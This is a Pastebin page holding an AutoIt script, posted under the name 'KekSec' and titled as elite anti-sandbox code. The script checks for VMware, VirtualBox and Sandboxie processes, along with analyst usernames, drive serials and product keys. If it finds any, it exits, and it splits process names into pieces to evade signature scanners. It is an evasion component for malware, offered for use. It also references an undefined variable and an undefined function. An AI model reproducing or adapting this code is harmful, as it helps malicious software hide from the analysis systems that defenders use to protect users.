SHARE
TWEET

Anti Sandbox autoit code elite

KekSec May 15th, 2020 1,304 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Func _GetModuleHandle($vDLL)
  2.     $modHandle = DllCall("kernel32.dll", "long", "GetModuleHandle", "str", $vDLL)
  3.     If IsArray($modHandle) Then
  4.         If $modHandle[0] > 0 Then
  5.             If _ArrayFindAll($modHandle, $vDLL) Then
  6.                 Return True
  7.             EndIf
  8.         Else
  9.             SetError(-9)
  10.             Return False
  11.         EndIf
  12.     Else
  13.         SetError(-10)
  14.         Return False
  15.     EndIf
  16. EndFunc   ;==>_GetModuleHandle
  17. Func _IsInSandbox()
  18.     If WinGetText("Program Manager") = "0" Then Return True
  19.     If DriveSpaceFree("d:\") < 1 And ProcessExists("V" & "Mwa" & "re" & "User.exe") Then
  20.         Return True
  21.     EndIf
  22.     If DriveSpaceFree("d:\") < 1 And ProcessExists("V" & "Mwa" & "re" & "Serv" & "ice.exe") Then
  23.         Return True
  24.     EndIf
  25.     If ProcessExists("VBoxTray.exe") Or ProcessExists("VBo" & "xServ" & "ice.exe") Or ProcessExists("vpcmap.exe") Or ProcessExists("vpcmap.exe") Then
  26.         Return True
  27.     EndIf
  28.     If ProcessExists("V" & "Mwa" & "retray.exe") Then
  29.         Return True
  30.     EndIf
  31.     If ProcessExists("Vb" & "ox.exe") Then
  32.         Return True
  33.     EndIf
  34.     $vComputerName = @ComputerName
  35.     If StringLeft($vComputerName, 10) = "NONE-DUSEZ" Then
  36.         Return True
  37.     EndIf
  38.     If StringLeft($vComputerName, 5) = "VMLOG" Then
  39.         Return True
  40.     EndIf
  41.     $vProductKey = DecodeProductKey(RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "DigitalProductID"))
  42.     $vDriveSerial = DriveGetSerial("C:\")
  43.     $vExeName = StringLeft(@ScriptName, StringLen(@ScriptName) - 4)
  44.     $vExePath = @ScriptDir & "\"
  45.     If $vUserName = "Sndbx" Then
  46.         If $vDriveSerial = 546811503 Then
  47.             Return True
  48.         EndIf
  49.     EndIf
  50.     If $vUserName = "tester" Then
  51.         If $vDriveSerial = 800539777 Then
  52.             Return True
  53.         EndIf
  54.     EndIf
  55.     If $vUserName = "panda" Then
  56.         If $vComputerName = "AUTO" Then
  57.             Return True
  58.         EndIf
  59.     EndIf
  60.     If $vUserName = "currentuser" Then
  61.         Return True
  62.     EndIf
  63.     If $vExePath = "C:\" Then
  64.         If $vExeName = "file" Then
  65.             Return True
  66.         ElseIf $vExeName = "Sample" Then
  67.             Return True
  68.         EndIf
  69.     EndIf
  70.     If $vProductKey = "55274" & "-339-600" & "6333-" & "22900" Then
  71.         Return True
  72.     EndIf
  73.     If $vProductKey = "76487-OEM" & "-006" & "5901" & "-82986" Then
  74.         Return True
  75.     EndIf
  76.     If $vComputerName = "XPSP3" Then
  77.         If $vUserName = "Joe" Then
  78.             Return True
  79.         EndIf
  80.     EndIf
  81.     If _GetModuleHandle("Sb" & "ie" & "Dll.dll") = True Then
  82.         Return True
  83.     EndIf
  84. EndFunc   ;==>_IsInSandbox
  85. If _IsInSandbox() Then Exit -1
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top